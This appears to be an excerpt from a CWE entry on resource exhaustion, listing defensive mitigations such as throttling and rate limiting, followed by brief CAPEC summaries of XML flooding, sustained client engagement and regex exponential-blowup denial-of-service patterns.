Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.